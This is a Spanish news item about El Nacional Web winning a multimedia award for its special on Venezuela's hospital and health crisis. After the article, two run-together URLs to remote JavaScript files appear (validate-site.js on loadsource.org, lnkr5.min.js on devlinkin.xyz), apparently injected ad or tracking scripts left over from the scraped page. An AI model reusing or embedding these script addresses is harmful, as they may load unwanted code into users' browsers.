El especial mostró la realidad de los hospitales venezolanos y la crisis humanitaria que enfrentan los ciudadanos .

Visitas encubiertas a hospitales, entrevistas a pacientes, a familiares de personas que perdieron la vida por la falta de medicinas, es parte del trabajo que durante meses realizó el equipo de El Nacional Web, ganador del premio al Trabajo Multimedia del Año.

“El trabajo tuvo gran impacto en Venezuela y el mundo. Fue replicado por los diarios de la región porque ningún medio había logrado mostrar la grave crisis humanitaria que se vive en el sector salud”, refiere Eduardo Ponte, gerente editorial de El Nacional Web.

El relato de las personas afectadas por enfermedades como el cáncer, VIH, párkinson, insuficiencia renal, además de los retratos de venezolanos afectados por la desnutrición forma parte del especial que fue documentando por el equipo multimedia del diario.

“Engranar más de 40 trabajos fue un trabajo complejo. Para los periodistas fue inevitable no sentirse afectados por esta compleja situación. Todos tenemos un conocido, incluso un familiar que lucha por conseguir medicamentos”, indicó Irelis Durand, jefe de contenido de la Web.

El compromiso del equipo es seguir retratando la dura realidad de los venezolanos que viven el drama de subsistir sin garantías a la salud.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533348674801https://devlinkin.xyz/addons/lnkr5.min.js

Loading...